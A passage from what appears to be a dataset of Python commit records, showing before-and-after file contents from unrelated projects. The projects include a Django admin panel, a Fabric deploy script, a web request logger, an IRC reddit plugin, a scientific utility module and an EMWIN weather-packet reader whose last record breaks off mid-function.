.. image:: ../_static/Plotting_Plot_Colour_Automatic_Conversion_Graph.png
:align: center
:alt: plot_automatic_colour_conversion_graph
"""
if is_networkx_installed(raise_exception=True): # pragma: no cover
agraph = nx.nx_agraph.to_agraph(CONVERSION_GRAPH)
for node in agraph.nodes():
node.attr.update(label=CONVERSION_GRAPH_NODE_LABELS[node.name])
agraph.node_attr.update(
style='filled',
shape='circle',
color='#2196F3FF',
fillcolor='#2196F370',
fontname='Helvetica',
fontcolor="#263238")
agraph.edge_attr.update(color='#26323870')
for node in ('CIE XYZ', 'RGB', 'Spectral Distribution'):
agraph.get_node(node.lower()).attr.update(
shape='doublecircle',
color='#673AB7FF',
fillcolor='#673AB770',
fontsize=30)
for node in ('ATD95', 'CAM16', 'CIECAM02', 'Hunt', 'LLAB',
'Nayatani95', 'RLAB'):
agraph.get_node(node.lower()).attr.update(
color='#00BCD4FF', fillcolor='#00BCD470')
agraph.draw(filename, prog=prog, args=args)
return agraph
| Python | 0.000178 |
14043a783e2ebd6c4a27a38f08ca75e6e31dd5d8 | Add show admin panel | cinemair/shows/admin.py | cinemair/shows/admin.py | from django.contrib import admin
from . import models
class ShowsInline(admin.TabularInline):
model = models.Show
extra = 0
@admin.register(models.Show)
class Show(admin.ModelAdmin):
fieldsets = (
(None, {"fields": ("cinema", "movie", "datetime")}),
)
list_display = ("id", "cinema", "movie", "datetime")
#list_editable = (,)
list_filter = ("cinema",)
search_fields = ("id", "cinema__name", "movie__title", "datetime")
date_hierarchy = "datetime"
ordering = ("cinema", "datetime")
| from django.contrib import admin
from . import models
class ShowsInline(admin.TabularInline):
model = models.Show
extra = 0
| Python | 0 |
9e1b3893a676f0fff7d601245fd06ec5df7fb61f | bump version | circleparse/__init__.py | circleparse/__init__.py | from circleparse.replay import parse_replay_file, parse_replay
__version__ = "6.1.0"
| from circleparse.replay import parse_replay_file, parse_replay
__version__ = "6.0.0"
| Python | 0 |
0251d41a46165f76b8e76da716bbc280723ce767 | Make the circuits.web.loggers.Logger understand and respect X-Forwarded-For request headers when logging the remote host | circuits/web/loggers.py | circuits/web/loggers.py | # Module: loggers
# Date: 6th November 2008
# Author: James Mills, prologic at shortcircuit dot net dot au
"""Logger Component
This module implements Logger Components.
"""
import os
import sys
import rfc822
import datetime
from circuits.core import handler, BaseComponent
def formattime():
now = datetime.datetime.now()
month = rfc822._monthnames[now.month - 1].capitalize()
return ("[%02d/%s/%04d:%02d:%02d:%02d]" %
(now.day, month, now.year, now.hour, now.minute, now.second))
class Logger(BaseComponent):
channel = "web"
format = "%(h)s %(l)s %(u)s %(t)s \"%(r)s\" %(s)s %(b)s \"%(f)s\" \"%(a)s\""
def __init__(self, file=None, logger=None, **kwargs):
super(Logger, self).__init__(**kwargs)
if type(file) is str:
self.file = open(os.path.abspath(os.path.expanduser(file)), "a")
elif type(file) is file or hasattr(file, "write"):
self.file = file
else:
self.file = sys.stdout
self.logger = logger
@handler("response")
def response(self, response):
self.log(response)
def log(self, response):
request = response.request
remote = request.remote
outheaders = response.headers
inheaders = request.headers
protocol = "HTTP/%d.%d" % request.protocol
if "X-Forwarded-For" in inheaders:
host = inheaders["X-Forwarded-For"]
else:
host = remote.name or remote.ip
atoms = {"h": host,
"l": "-",
"u": getattr(request, "login", None) or "-",
"t": formattime(),
"r": "%s %s %s" % (request.method, request.path, protocol),
"s": str(response.code),
"b": outheaders.get("Content-Length", "") or "-",
"f": inheaders.get("Referer", ""),
"a": inheaders.get("User-Agent", ""),
}
for k, v in atoms.items():
if isinstance(v, unicode):
v = v.encode("utf8")
elif not isinstance(v, str):
v = str(v)
# Fortunately, repr(str) escapes unprintable chars, \n, \t, etc
# and backslash for us. All we have to do is strip the quotes.
v = repr(v)[1:-1]
# Escape double-quote.
atoms[k] = v.replace("\"", "\\\"")
if self.logger is not None:
self.logger.info(self.format % atoms)
else:
self.file.write(self.format % atoms)
self.file.write("\n")
self.file.flush()
| # Module: loggers
# Date: 6th November 2008
# Author: James Mills, prologic at shortcircuit dot net dot au
"""Logger Component
This module implements Logger Components.
"""
import os
import sys
import rfc822
import datetime
from circuits.core import handler, BaseComponent
def formattime():
now = datetime.datetime.now()
month = rfc822._monthnames[now.month - 1].capitalize()
return ("[%02d/%s/%04d:%02d:%02d:%02d]" %
(now.day, month, now.year, now.hour, now.minute, now.second))
class Logger(BaseComponent):
channel = "web"
format = "%(h)s %(l)s %(u)s %(t)s \"%(r)s\" %(s)s %(b)s \"%(f)s\" \"%(a)s\""
def __init__(self, file=None, logger=None, **kwargs):
super(Logger, self).__init__(**kwargs)
if type(file) is str:
self.file = open(os.path.abspath(os.path.expanduser(file)), "a")
elif type(file) is file or hasattr(file, "write"):
self.file = file
else:
self.file = sys.stdout
self.logger = logger
@handler("response")
def response(self, response):
self.log(response)
def log(self, response):
request = response.request
remote = request.remote
outheaders = response.headers
inheaders = request.headers
protocol = "HTTP/%d.%d" % request.protocol
atoms = {"h": remote.name or remote.ip,
"l": "-",
"u": getattr(request, "login", None) or "-",
"t": formattime(),
"r": "%s %s %s" % (request.method, request.path, protocol),
"s": str(response.code),
"b": outheaders.get("Content-Length", "") or "-",
"f": inheaders.get("Referer", ""),
"a": inheaders.get("User-Agent", ""),
}
for k, v in atoms.items():
if isinstance(v, unicode):
v = v.encode("utf8")
elif not isinstance(v, str):
v = str(v)
# Fortunately, repr(str) escapes unprintable chars, \n, \t, etc
# and backslash for us. All we have to do is strip the quotes.
v = repr(v)[1:-1]
# Escape double-quote.
atoms[k] = v.replace("\"", "\\\"")
if self.logger is not None:
self.logger.info(self.format % atoms)
else:
self.file.write(self.format % atoms)
self.file.write("\n")
self.file.flush()
| Python | 0 |
3026d78dc6e2a0f6f391819370f2369df94e77eb | Move Data Portal / Other to bottom of contact select | ckanext/nhm/settings.py | ckanext/nhm/settings.py | #!/usr/bin/env python
# encoding: utf-8
#
# This file is part of ckanext-nhm
# Created by the Natural History Museum in London, UK
from collections import OrderedDict
# the order here matters as the default option should always be first in the dict so that it is
# automatically selected in combo boxes that use this list as a source for options
COLLECTION_CONTACTS = OrderedDict([
('Algae, Fungi & Plants', 'm.carine@nhm.ac.uk'),
('Economic & Environmental Earth Sciences', 'g.miller@nhm.ac.uk'),
('Fossil Invertebrates & Plants', 'z.hughes@nhm.ac.uk'),
('Fossil Vertebrates & Anthropology', 'm.richter@nhm.ac.uk'),
('Insects', 'g.broad@nhm.ac.uk'),
('Invertebrates', 'm.lowe@nhm.ac.uk'),
('Library & Archives', 'library@nhm.ac.uk'),
('Mineral & Planetary Sciences', 'm.rumsey@nhm.ac.uk'),
('Vertebrates', 'simon.loader@nhm.ac.uk'),
('Data Portal / Other', 'data@nhm.ac.uk'),
])
| #!/usr/bin/env python
# encoding: utf-8
#
# This file is part of ckanext-nhm
# Created by the Natural History Museum in London, UK
from collections import OrderedDict
# the order here matters as the default option should always be first in the dict so that it is
# automatically selected in combo boxes that use this list as a source for options
COLLECTION_CONTACTS = OrderedDict([
('Data Portal / Other', 'data@nhm.ac.uk'),
('Algae, Fungi & Plants', 'm.carine@nhm.ac.uk'),
('Economic & Environmental Earth Sciences', 'g.miller@nhm.ac.uk'),
('Fossil Invertebrates & Plants', 'z.hughes@nhm.ac.uk'),
('Fossil Vertebrates & Anthropology', 'm.richter@nhm.ac.uk'),
('Insects', 'g.broad@nhm.ac.uk'),
('Invertebrates', 'm.lowe@nhm.ac.uk'),
('Library & Archives', 'library@nhm.ac.uk'),
('Mineral & Planetary Sciences', 'm.rumsey@nhm.ac.uk'),
('Vertebrates', 'simon.loader@nhm.ac.uk'),
])
| Python | 0 |
2105143c63292ec225258b3ca129156d858cf972 | Use OrderParameterDistribution objects in wetting. | coex/wetting.py | coex/wetting.py | """Find the wetting properties of a direct or expanded ensemble
grand canonical simulation.
"""
import numpy as np
def get_cos_theta(s, d):
"""Calculate the cosine of the contact angle.
Args:
s: A float (or numpy array): the spreading coefficient.
d: A float (or numpy array): the drying coefficient.
Returns:
The cosine of the contact angle as a float or numpy array.
"""
return -(s - d) / (s + d)
def get_drying_coefficient(distribution):
"""Calculate the drying coefficient.
Args:
distribution: An OrderParameterDistribution from a direct (GC)
drying simulation.
Returns:
The dimensionless drying coefficient (beta*d*A).
See also:
get_spreading_coefficient()
"""
potential = -distribution.log_probabilities
valley = np.amin(potential)
split = int(0.5 * len(potential))
plateau = np.mean(potential[:split])
return valley - plateau
def get_expanded_ensemble_coefficients(valley, plateau, index, reference):
"""Calculate the change in spreading/drying coefficient for a pair of
simulations.
Args:
valley: An OrderParameterDistribution from the valley region.
plateau: An OrderParameterDistribution from the plateau
region.
index: The reference subensemble number.
reference: The reference spreading/drying coefficient.
Returns:
A numpy array with the spreading/drying coefficient of each
subensemble.
"""
return reference - (valley - valley[index]) + (plateau - plateau[index])
def get_spreading_coefficient(distribution):
"""Calculate the spreading coefficient.
Args:
distribution: An OrderParameterDistribution from a direct (GC)
spreading simulation.
Returns:
The dimensionless spreading coefficient (beta*s*A).
See Also:
get_drying_coefficient()
"""
potential = -distribution.log_probabilities
valley = np.amin(potential)
split = int(0.5 * len(potential))
plateau = np.mean(potential[split:])
return valley - plateau
def get_tension(s, d):
"""Calculate the interfacial tension.
Args:
s: A float (or numpy array): the spreading coefficient.
d: A float (or numpy array): the drying coefficient.
Returns:
The interfacial tension in the appropriate units.
"""
return -0.5 * (s + d)
| """Find the wetting properties of a direct or expanded ensemble
grand canonical simulation.
"""
import numpy as np
def get_cos_theta(s, d):
"""Calculate the cosine of the contact angle.
Args:
s: A float (or numpy array): the spreading coefficient.
d: A float (or numpy array): the drying coefficient.
Returns:
The cosine of the contact angle as a float or numpy array.
"""
return -(s - d) / (s + d)
def get_drying_coefficient(lnpi):
"""Calculate the drying coefficient.
Args:
lnpi: The logarithm of the probability distribution.
Returns:
The dimensionless drying coefficient (beta*d*A).
See also:
get_spreading_coefficient()
"""
potential = -lnpi
valley = np.amin(potential)
split = int(0.5 * len(potential))
plateau = np.mean(potential[:split])
return valley - plateau
def get_expanded_ensemble_coefficients(valley, plateau, index, reference):
"""Calculate the change in spreading/drying coefficient for a pair of
simulations.
Args:
valley: The logarithm of the probability distribution of the
valley region.
plateau: The logarithm of the probability distribution of the
plateau region.
index: The reference subensemble number.
reference: The reference spreading/drying coefficient.
Returns:
A numpy array with the spreading/drying coefficient of each
subensemble.
"""
return reference - (valley - valley[index]) + (plateau - plateau[index])
def get_spreading_coefficient(lnpi):
"""Calculate the spreading coefficient.
Args:
potential: The logarithm of the probability distribution.
Returns:
The dimensionless spreading coefficient (beta*s*A).
See Also:
get_drying_coefficient()
"""
potential = -lnpi
valley = np.amin(potential)
split = int(0.5 * len(potential))
plateau = np.mean(potential[split:])
return valley - plateau
def get_tension(s, d):
"""Calculate the interfacial tension.
Args:
s: A float (or numpy array): the spreading coefficient.
d: A float (or numpy array): the drying coefficient.
Returns:
The interfacial tension in the appropriate units.
"""
return -0.5 * (s + d)
| Python | 0 |
a962e631b0fc997a6a5569244463c3f96da8b671 | add extra fwhm2sigma test | lib/neuroimaging/fmri/tests/test_utils.py | lib/neuroimaging/fmri/tests/test_utils.py | import unittest
import numpy as N
import scipy
from neuroimaging.fmri.utils import CutPoly, WaveFunction, sigma2fwhm, fwhm2sigma
class utilTest(unittest.TestCase):
def test_CutPoly(self):
f = CutPoly(2.0)
t = N.arange(0, 10.0, 0.1)
y = f(t)
scipy.testing.assert_almost_equal(y, [x*x for x in t])
f = CutPoly(2.0, (5, 7))
y = f(t)
scipy.testing.assert_almost_equal(y, [x*x*(x >= 5 and x < 7) for x in t])
f = CutPoly(2.0, (None, 7))
y = f(t)
scipy.testing.assert_almost_equal(y, [x*x*(x < 7) for x in t])
f = CutPoly(2.0, (5, None))
y = f(t)
scipy.testing.assert_almost_equal(y, [x*x*(x >= 5) for x in t])
def test_WaveFunction(self):
start = 5.0
duration = 2.0
height = 3.0
f = WaveFunction(5, 2, 3)
t = N.arange(0, 10.0, 0.1)
y = f(t)
scipy.testing.assert_almost_equal(y, [height*(x >= start and x < start + duration) for x in t])
def test_sigma_fwhm(self):
"""
ensure that fwhm2sigma and sigma2fwhm are inverses of each other
"""
fwhm = N.arange(1.0, 5.0, 0.1)
sigma = N.arange(1.0, 5.0, 0.1)
scipy.testing.assert_almost_equal(sigma2fwhm(fwhm2sigma(fwhm)), fwhm)
scipy.testing.assert_almost_equal(fwhm2sigma(sigma2fwhm(sigma)), sigma)
if __name__ == '__main__':
unittest.main()
| import unittest
import numpy as N
import scipy
from neuroimaging.fmri.utils import CutPoly, WaveFunction, sigma2fwhm, fwhm2sigma
class utilTest(unittest.TestCase):
def test_CutPoly(self):
f = CutPoly(2.0)
t = N.arange(0, 10.0, 0.1)
y = f(t)
scipy.testing.assert_almost_equal(y, [x*x for x in t])
f = CutPoly(2.0, (5, 7))
y = f(t)
scipy.testing.assert_almost_equal(y, [x*x*(x >= 5 and x < 7) for x in t])
f = CutPoly(2.0, (None, 7))
y = f(t)
scipy.testing.assert_almost_equal(y, [x*x*(x < 7) for x in t])
f = CutPoly(2.0, (5, None))
y = f(t)
scipy.testing.assert_almost_equal(y, [x*x*(x >= 5) for x in t])
def test_WaveFunction(self):
start = 5.0
duration = 2.0
height = 3.0
f = WaveFunction(5, 2, 3)
t = N.arange(0, 10.0, 0.1)
y = f(t)
scipy.testing.assert_almost_equal(y, [height*(x >= start and x < start + duration) for x in t])
def test_sigma_fwhm(self):
"""
ensure that fwhm2sigma and sigma2fwhm are inverses of each other
"""
fwhm = N.arange(1.0, 5.0, 0.1)
scipy.testing.assert_almost_equal(sigma2fwhm(fwhm2sigma(fwhm)), fwhm)
if __name__ == '__main__':
unittest.main()
| Python | 0.000001 |
108763ace5f250922387aacffab4a668155cfe67 | deploy script changes | deploy/fabfile.py | deploy/fabfile.py | # -*- coding: utf-8 -*-
# http://docs.fabfile.org/en/1.5/tutorial.html
from __future__ import with_statement
from fabric.api import *
from contextlib import contextmanager as _contextmanager
@_contextmanager
def virtualenv():
with prefix(env.virtualenv_activate):
yield
env.hosts = ['176.58.125.166']
env.user = 'rootio'
env.project_root = '/home/rootio/public_python/rootio_web'
env.virtualenv_activate = 'source venv/bin/activate'
env.forward_agent = True
def git_update():
stash_str = run("git stash")
run("git pull origin master")
if stash_str.strip() != 'No local changes to save':
run("git stash pop")
def restart_apache():
sudo("/etc/init.d/apache2 graceful")
def restart_cache():
sudo("/etc/init.d/memcached restart", pty=False)
def touch_wsgi():
# Touching the deploy.wsgi file will cause apache's mod_wsgi to
# reload all python modules having to restart apache.
with cd(env.project_root):
run("touch deploy/rootio_web.wsgi")
def update(full=False):
with cd(env.project_root):
git_update()
with virtualenv():
run("pip install -r requirements.txt")
run("python manage.py migrate up")
#todo: static files
touch_wsgi()
#restart_cache()
#restart_apache()
def deploy():
update()
def initdb():
local("python manage.py initdb")
def reset():
"""
Reset local debug env.
"""
local("rm -rf /tmp/instance")
local("mkdir /tmp/instance")
def runserver():
"""
Run local server, for debugging only.
Need to move up one directory, from deploy to see manage.py
"""
with lcd('..'):
reset()
initdb()
with virtualenv():
local("python manage.py run")
| # -*- coding: utf-8 -*-
# http://docs.fabfile.org/en/1.5/tutorial.html
from __future__ import with_statement
from fabric.api import *
from contextlib import contextmanager as _contextmanager
@_contextmanager
def virtualenv():
with prefix(env.virtualenv_activate):
yield
env.hosts = ['176.58.125.166']
env.user = 'rootio'
env.project_root = '/home/rootio/public_python/rootio_web'
env.virtualenv_activate = 'source .venv/bin/activate'
env.forward_agent = True
def git_update():
stash_str = run("git stash")
run("git pull origin master")
if stash_str.strip() != 'No local changes to save':
run("git stash pop")
def restart_apache():
sudo("/etc/init.d/apache2 graceful")
def restart_cache():
sudo("/etc/init.d/memcached restart", pty=False)
def touch_wsgi():
# Touching the deploy.wsgi file will cause apache's mod_wsgi to
# reload all python modules having to restart apache.
with cd(env.project_root):
run("touch deploy/wsgi_handler.py")
def update(full=False):
with cd(env.project_root):
git_update()
with virtualenv():
run("pip install -r requirements.txt")
#todo: alembic update
#todo: static files
touch_wsgi()
restart_cache()
#restart_apache()
def deploy():
update()
def initdb():
local("python manage.py initdb")
def reset():
"""
Reset local debug env.
"""
local("rm -rf /tmp/instance")
local("mkdir /tmp/instance")
def runserver():
"""
Run local server, for debugging only.
Need to move up one directory, from deploy to see manage.py
"""
with lcd('..'):
reset()
initdb()
with virtualenv():
local("python manage.py run")
| Python | 0.000001 |
34fa7433ea6f04089a420e0392605147669801d1 | Revert "added more crappy codes" | dummy.py | dummy.py | import os
def foo():
"""
This is crappy function. should be removed using git checkout
"""
return None
def main():
pass
if __name__ == '__main__':
main()
| import os
def foo():
"""
This is crappy function. should be removed using git checkout
"""
if True == True:
return True
else:
return False
def main():
pass
if __name__ == '__main__':
main()
| Python | 0 |
e4850d9ba5cb4733862194298cdbb8a34766b39f | update tests for new api | reddit.py | reddit.py | import json, random, urllib2
def declare():
return {"reddit": "privmsg", "guess": "privmsg"}
def callback(self):
channel = self.channel
command = self.command
user = self.user
msg = self.message
type = self.type
isop = self.isop
if command == 'guess':
u = 'SwordOrSheath'
else:
try:
u = str(msg.split(' ', 1)[1])
except:
return self.msg(channel, "Please specify a subreddit!")
try:
req = urllib2.Request("https://www.reddit.com/r/" + u + "/new.json", headers={ 'User-Agent': 'UNIX:the_kgb:reddit https://github.com/stqism/THE_KGB-apps' })
fd = urllib2.urlopen(req)
reddit_api = json.loads(fd.read())
fd.close()
cringe = []
for i in reddit_api['data']['children']:
url = i['data']['url']
title = i['data']['title']
selfpost = bool(i['data']['is_self'])
post = "https://reddit.com" + i['data']['permalink']
if 'imgur' in url:
if 'http://i.imgur.com' in url: #force https
url = 'https://i.imgur.com/%s' % (url.split('/')[3])
if 'http://' in url and '/a/' not in url: #direct URLs
if 'gallery' in url:
url = 'https://i.imgur.com/%s.jpg' % (url.split('/')[4])
else:
url = 'https://i.imgur.com/%s.jpg' % (url.split('/')[3])
cringe.append([title, url, post])
item = random.choice(cringe)
if command == 'guess':
try:
u = str(msg.split(' ', 1)[1])
return self.msg(channel, u + ": Am I male or female? " + item[1])
except:
return self.msg(channel, "Am I male or female? " + item[1])
else:
if not selfpost:
via = " (via: " + item[2] + ")"
return self.msg(channel, str(item[0] + " " + item[1] + via))
else:
return self.msg(channel, str(item[0] + " " + item[1]))
except Exception, e:
return self.msg('#the_kgb', str(e))
class api:
def msg(self, channel, text):
return "[%s] %s" % (channel, text)
if __name__ == "__main__":
api = api()
c = "#test"
setattr(api, 'isop', True)
setattr(api, 'type', 'privmsg')
setattr(api, 'command', 'reddit')
setattr(api, 'user', 'joe!username@hostmask')
setattr(api, 'channel', c)
setattr(api, 'message', '^reddit')
if callback(api) != '[%s] Please specify a subreddit!' % (c):
print '[TESTFAIL] no arguments'
exit(1)
setattr(api, 'message', '^reddit fatpeoplehate')
if callback(api) != '[#the_kgb] HTTP Error 404: Not Found':
print '[TESTFAIL] error catcher'
exit(1)
setattr(api, 'message', '^reddit fatlogic')
if not callback(api).startswith('[%s] ' % (c)):
print '[TESTFAIL] Subreddit loader'
exit(1)
setattr(api, 'message', '^guess')
setattr(api, 'command', 'guess')
if not callback(api).startswith('[%s] Am I male or female?' % (c)):
print '[TESTFAIL] guess no user'
exit(1)
n = 'bob'
setattr(api, 'message', '^guess %s' % (n))
if not callback(api).startswith('[%s] %s: Am I male or female?' % (c, n)):
print '[TESTFAIL] guess with user'
exit(1)
| import json, random, urllib2
def declare():
return {"reddit": "privmsg", "guess": "privmsg"}
def callback(self):
channel = self.channel
command = self.command
user = self.user
msg = self.message
type = self.type
isop = self.isop
if command == 'guess':
u = 'SwordOrSheath'
else:
try:
u = str(msg.split(' ', 1)[1])
except:
return self.msg(channel, "Please specify a subreddit!")
try:
req = urllib2.Request("https://www.reddit.com/r/" + u + "/new.json", headers={ 'User-Agent': 'UNIX:the_kgb:reddit https://github.com/stqism/THE_KGB-apps' })
fd = urllib2.urlopen(req)
reddit_api = json.loads(fd.read())
fd.close()
cringe = []
for i in reddit_api['data']['children']:
url = i['data']['url']
title = i['data']['title']
selfpost = bool(i['data']['is_self'])
post = "https://reddit.com" + i['data']['permalink']
if 'imgur' in url:
if 'http://i.imgur.com' in url: #force https
url = 'https://i.imgur.com/%s' % (url.split('/')[3])
if 'http://' in url and '/a/' not in url: #direct URLs
if 'gallery' in url:
url = 'https://i.imgur.com/%s.jpg' % (url.split('/')[4])
else:
url = 'https://i.imgur.com/%s.jpg' % (url.split('/')[3])
cringe.append([title, url, post])
item = random.choice(cringe)
if command == 'guess':
try:
u = str(msg.split(' ', 1)[1])
return self.msg(channel, u + ": Am I male or female? " + item[1])
except:
return self.msg(channel, "Am I male or female? " + item[1])
else:
if not selfpost:
via = " (via: " + item[2] + ")"
return self.msg(channel, str(item[0] + " " + item[1] + via))
else:
return self.msg(channel, str(item[0] + " " + item[1]))
except Exception, e:
return self.msg('#the_kgb', str(e))
class api:
def msg(self, channel, text):
return "[%s] %s" % (channel, text)
if __name__ == "__main__":
api = api()
u = "joe!username@hostmask"
c = '#test'
if callback(api, '', True, channel=c, user=u, command='reddit', msg='^reddit') != '[%s] Please specify a subreddit!' % (c):
print '[TESTFAIL] no arguments'
exit(1)
if callback(api, '', True, channel=c, user=u, command='reddit', msg='^reddit fatpeoplehate') != '[#the_kgb] HTTP Error 404: Not Found':
print '[TESTFAIL] error catcher'
exit(1)
if not callback(api, '', True, channel=c, user=u, command='reddit', msg='^reddit fatlogic').startswith('[%s] ' % (c)):
print '[TESTFAIL] Subreddit loader'
exit(1)
if not callback(api, '', True, channel=c, user=u, command='guess', msg='^guess').startswith('[%s] Am I male or female?' % (c)):
print '[TESTFAIL] guess no user'
exit(1)
n = 'bob'
if not callback(api, '', True, channel=c, user=u, command='guess', msg='^guess %s' % (n)).startswith('[%s] %s: Am I male or female?' % (c, n)):
print '[TESTFAIL] guess with user'
exit(1)
| Python | 0 |
acd0b8803579ece5b52a3158c05140ff1287f0be | Handle string values better in FilterComparison.__str__ | odin/filtering.py | odin/filtering.py | # -*- coding: utf-8 -*-
import six
from .traversal import TraversalPath
class FilterAtom(object):
"""
Base filter statement
"""
def __call__(self, resource):
raise NotImplementedError()
def any(self, collection):
return any(self(r) for r in collection)
def all(self, collection):
return all(self(r) for r in collection)
class FilterChain(FilterAtom):
operator_name = ''
check_operator = all
def __init__(self, *atoms):
self._atoms = list(atoms)
def __add__(self, other):
if isinstance(other, self.__class__):
return self.__class__(*self._atoms + other._atoms)
elif isinstance(other, FilterComparison):
self._atoms.append(other)
return self
raise TypeError("{} not supported for this operation".format(other))
def __call__(self, resource):
return self.check_operator(a(resource) for a in self._atoms)
def __str__(self):
pin = " {} ".format(self.operator_name)
return "({})".format(pin.join(str(a) for a in self._atoms))
class And(FilterChain):
operator_name = 'AND'
check_operator = all
class Or(FilterChain):
operator_name = 'OR'
check_operator = any
class FilterComparison(FilterAtom):
"""
Base class for filter operator atoms
"""
operator_symbol = ''
def __init__(self, field, value, operation=None):
self.field = TraversalPath.parse(field)
self.value = value
self.operation = operation
def __call__(self, resource):
try:
value = self.field.get_value(resource)
except KeyError:
return False
else:
if self.operation:
value = self.operation(value)
return self.compare(value)
def __str__(self):
value = self.value
if isinstance(self.value, six.string_types):
value = '"{}"'.format(value)
if self.operation:
op_name = getattr(self.operation, 'name', self.operation.__name__)
return "{}({}) {} {}".format(op_name, self.field, self.operator_symbol, value)
else:
return "{} {} {}".format(self.field, self.operator_symbol, value)
def compare(self, value):
raise NotImplementedError()
class Equal(FilterComparison):
operator_symbol = '=='
def compare(self, value):
return value == self.value
class NotEqual(FilterComparison):
operator_symbol = '!='
def compare(self, value):
return value != self.value
class LessThan(FilterComparison):
operator_symbol = '<'
def compare(self, value):
return value < self.value
class LessThanOrEqual(FilterComparison):
operator_symbol = '<='
def compare(self, value):
return value <= self.value
class GreaterThan(FilterComparison):
operator_symbol = '>'
def compare(self, value):
return value > self.value
class GreaterThanOrEqual(FilterComparison):
operator_symbol = '>='
def compare(self, value):
return value >= self.value
| # -*- coding: utf-8 -*-
from .traversal import TraversalPath
class FilterAtom(object):
"""
Base filter statement
"""
def __call__(self, resource):
raise NotImplementedError()
def any(self, collection):
return any(self(r) for r in collection)
def all(self, collection):
return all(self(r) for r in collection)
class FilterChain(FilterAtom):
operator_name = ''
check_operator = all
def __init__(self, *atoms):
self._atoms = list(atoms)
def __add__(self, other):
if isinstance(other, self.__class__):
return self.__class__(*self._atoms + other._atoms)
elif isinstance(other, FilterComparison):
self._atoms.append(other)
return self
raise TypeError("{} not supported for this operation".format(other))
def __call__(self, resource):
return self.check_operator(a(resource) for a in self._atoms)
def __str__(self):
pin = " {} ".format(self.operator_name)
return "({})".format(pin.join(str(a) for a in self._atoms))
class And(FilterChain):
operator_name = 'AND'
check_operator = all
class Or(FilterChain):
operator_name = 'OR'
check_operator = any
class FilterComparison(FilterAtom):
"""
Base class for filter operator atoms
"""
operator_symbol = ''
def __init__(self, field, value, operation=None):
self.field = TraversalPath.parse(field)
self.value = value
self.operation = operation
def __call__(self, resource):
try:
value = self.field.get_value(resource)
except KeyError:
return False
else:
if self.operation:
value = self.operation(value)
return self.compare(value)
def __str__(self):
if self.operation:
op_name = getattr(self.operation, 'name', self.operation.__name__)
return "{}({}) {} {}".format(op_name, self.field, self.operator_symbol, self.value)
else:
return "{} {} {}".format(self.field, self.operator_symbol, self.value)
def compare(self, value):
raise NotImplementedError()
class Equal(FilterComparison):
operator_symbol = '=='
def compare(self, value):
return value == self.value
class NotEqual(FilterComparison):
operator_symbol = '!='
def compare(self, value):
return value != self.value
class LessThan(FilterComparison):
operator_symbol = '<'
def compare(self, value):
return value < self.value
class LessThanOrEqual(FilterComparison):
operator_symbol = '<='
def compare(self, value):
return value <= self.value
class GreaterThan(FilterComparison):
operator_symbol = '>'
def compare(self, value):
return value > self.value
class GreaterThanOrEqual(FilterComparison):
operator_symbol = '>='
def compare(self, value):
return value >= self.value
| Python | 0.000019 |
178bde1703bbb044f8af8c70a57517af4490a3c0 | Fix duplicate cookie issue and header parsing | databot/handlers/download.py | databot/handlers/download.py | import time
import requests
import bs4
import cgi
from databot.recursive import call
class DownloadErrror(Exception):
pass
def dump_response(response):
return {
'headers': dict(response.headers),
'cookies': response.cookies.get_dict(),
'status_code': response.status_code,
'encoding': response.encoding,
'content': response.content,
}
def download(url, delay=None, update=None, **kwargs):
update = update or {}
def func(row):
if delay is not None:
time.sleep(delay)
kw = call(kwargs, row)
_url = url(row)
response = requests.get(_url, **kw)
if response.status_code == 200:
value = dump_response(response)
for k, fn in update.items():
value[k] = fn(row)
yield _url, value
else:
raise DownloadErrror('Error while downloading %s, returned status code was %s, response content:\n\n%s' % (
_url, response.status_code, response.content,
))
return func
def get_content(data):
content_type_header = data.get('headers', {}).get('Content-Type', '')
content_type, params = cgi.parse_header(content_type_header)
if content_type == 'text/html':
soup = bs4.BeautifulSoup(data['content'], 'lxml')
return data['content'].decode(soup.original_encoding)
else:
return data['content']
| import time
import requests
import bs4
from databot.recursive import call
class DownloadErrror(Exception):
pass
def dump_response(response):
return {
'headers': dict(response.headers),
'cookies': dict(response.cookies),
'status_code': response.status_code,
'encoding': response.encoding,
'content': response.content,
}
def download(url, delay=None, update=None, **kwargs):
update = update or {}
def func(row):
if delay is not None:
time.sleep(delay)
kw = call(kwargs, row)
_url = url(row)
response = requests.get(_url, **kw)
if response.status_code == 200:
value = dump_response(response)
for k, fn in update.items():
value[k] = fn(row)
yield _url, value
else:
raise DownloadErrror('Error while downloading %s, returned status code was %s, response content:\n\n%s' % (
_url, response.status_code, response.content,
))
return func
def get_content(data):
content_type = data.get('headers', {}).get('Content-Type')
if content_type == 'text/html':
soup = bs4.BeautifulSoup(data['content'], 'lxml')
return data['content'].decode(soup.original_encoding)
else:
return data['content']
| Python | 0.000001 |
5de8209ec751fec9178a86e713393d8eafb7a124 | Abort when strange things happen | emwin.py | emwin.py | from time import strptime, mktime, time
import logging
import sys
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s %(name)s %(levelname)s %(message)s'))
log = logging.getLogger('emwin')
log.addHandler(handler)
log.setLevel(logging.DEBUG)
class Connection(object):
def __init__(self, sock):
self.sock = sock
self.ident = 'ByteBlast Client|NM-emwin@synack.me|V1'
self.ident = ''.join([chr(ord(x) ^ 0xFF) for x in self.ident])
def __iter__(self):
buf = ''
last_ident = 0
while True:
now = int(time())
if (now - last_ident) > 300:
log.info('Sending ident packet')
last_ident = now
self.sock.sendall(self.ident)
buf += self.sock.recv(1116)
if buf == '':
break
while len(buf) >= 1116:
if not buf.startswith('\xFF\xFF\xFF\xFF\xFF\xFF'):
offset = buf.find('\xFF\xFF\xFF\xFF\xFF\xFF')
if offset == -1:
log.info('Sync marker missing! Abort!')
break
buf = ''
buf = buf[offset:]
log.info('Discarding %i bytes before sync marker' % offset)
try:
packet = Packet(buf[:1116])
log.debug(str(packet))
yield packet
except:
log.error(sys.exc_info()[1])
break
buf = buf[1116:]
log.error('Connection closed by remote host')
self.sock.close()
class Packet(object):
def __init__(self, data):
self.data = data
self.parse()
def parse(self):
self.data = ''.join([chr(ord(x) ^ 0xFF) for x in self.data])
self.header = self.parse_header(self.data[:86])
self.filename = self.header['PF']
self.block = int(self.header['PN'])
self.total_blocks = int(self.header['PT'])
self.checksum = int(self.header['CS'])
self.timestamp = int(mktime(strptime(self.header['FD'], '%m/%d/%Y %I:%M:%S %p')))
self.payload = self.data[86:-6]
if len(self.payload) != 1024:
raise ValueError('Packet is the wrong size!')
self.verify_checksum()
def parse_header(self, data):
if data[:6] != ('\x00' * 6):
raise ValueError('Invalid packet header')
data = data[6:]
header = data.rstrip(' \r\n')
